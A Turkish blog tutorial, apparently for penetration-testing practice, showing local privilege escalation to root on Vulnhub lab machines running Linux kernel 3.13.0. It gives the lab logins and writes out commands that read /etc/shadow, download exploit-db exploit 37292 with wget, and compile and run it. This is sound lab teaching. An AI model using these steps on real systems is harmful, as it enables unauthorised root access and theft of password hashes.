Linux Kernel 3.13.0 İşletim Sistemindeki Hak Yükseltme Zafiyetinin İstismar Edilerek root Yetkileri ile Komut Satırının Elde Edilmesi

Sızma testleri sırasında standart haklar ile erişim sağlanabilmiş bir bilgisayarda, hak yükseltilerek yönetici hakları elde edilmeye çalışılır. Hak yükseltmek için kullanılan yöntemlerden birisi de işletim sistemindeki zafiyetlerin istismar edilmesidir. Bu yazıda, Linux Kernel 3.13.0 işletim sistemine sahip 6Days-Lab sanal makinesi üzerinde çalışan bir zafiyet istismar edilerek standart kullanıcı haklarından “root” kullanıcısı hakkı ile komut satırı / kabuk elde edilecektir.

 

Yazıda kullanılan 6Days-Lab sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/6days-lab-11,156/

 

Bu makineye aşağıdaki bilgiler ile erişim sağlanabilir.

Kullanıcı Adı: andrea
Parola: SayNoToPentests

 

Not: Aynı zafiyet Troll:1 sanal makinesinde de bulunmaktadır. Troll:1 sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/tr0ll-1,100/

Troll:1 makinesine aşağıdaki bilgiler ile erişim sağlanabilir.

Kullanıcı Adı: overflow
Parola: Pass.txt

 

Linux işletim sistemine standart yetkilerle elde edilen erişimde standart bir kullanıcı (andrea) haklarına sahip olunduğu görülmektedir.

id
head -3 /etc/passwd
head -3 /etc/shadow

 

İşletim sisteminin sürüm bilgilerine bakıldığında Ubuntu 12.04.5 LTS kullanıldığı ve Linux çekirdek sürümü 3.13.0 olduğu görülmektedir.

uname -a
cat /etc/*release*

 

Linux Kernel 3.13.0’te kritik bir zafiyet bulunmaktadır. Bu zafiyeti istismar edecek kod exploit-db‘den indirilerek hedef sisteme aktarılacak ve çalıştırılacaktır.

https://www.exploit-db.com/exploits/37292/

 

Benzer olarak istismar kodu Kernel-Exploits sitesinden de temin edilebilirdi.

https://www.kernel-exploits.com/

 

Veya, internetin olmadığı durumda ise Kali içerisindeki istismar kodu da kullanılabilirdi.

searchsploit ubuntu 12.04
ls -la /usr/share/exploitdb/platforms/linux/local/37292.c

 

Hedef sisteme bu dosya indirilir ve bu dosyanın C dosya tipinde olduğu görülür.

ls -la
wget https://www.exploit-db.com/download/37292 –no-check-certificate
ls -la
file 37292

 

İstismar kodu derlenir.

mv 37292 IstismarKaynakKodu.c
gcc IstismarKaynakKodu.c -o HakYukseltme
ls -la

 

Sonrasında da zafiyetli sistemde çalıştırılır ve “root” yetkilerine erişim sağlanılmış olur.

./HakYukseltme
id
whoami
head -3 /etc/shadow

 

Belirtilen zafiyetin bulunduğu diğer sanal ortamlardan bazıları aşağıki gibidir:

  • Droopy v0.2: https://www.vulnhub.com/entry/droopy-v02,143/
  • VulnOS 2: https://www.vulnhub.com/entry/vulnos-2,147/

 

Kaynak:

https://lamehackersguide.blogspot.com.tr/2016/07/how-i-rooted-6days-lab-11.html

 

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.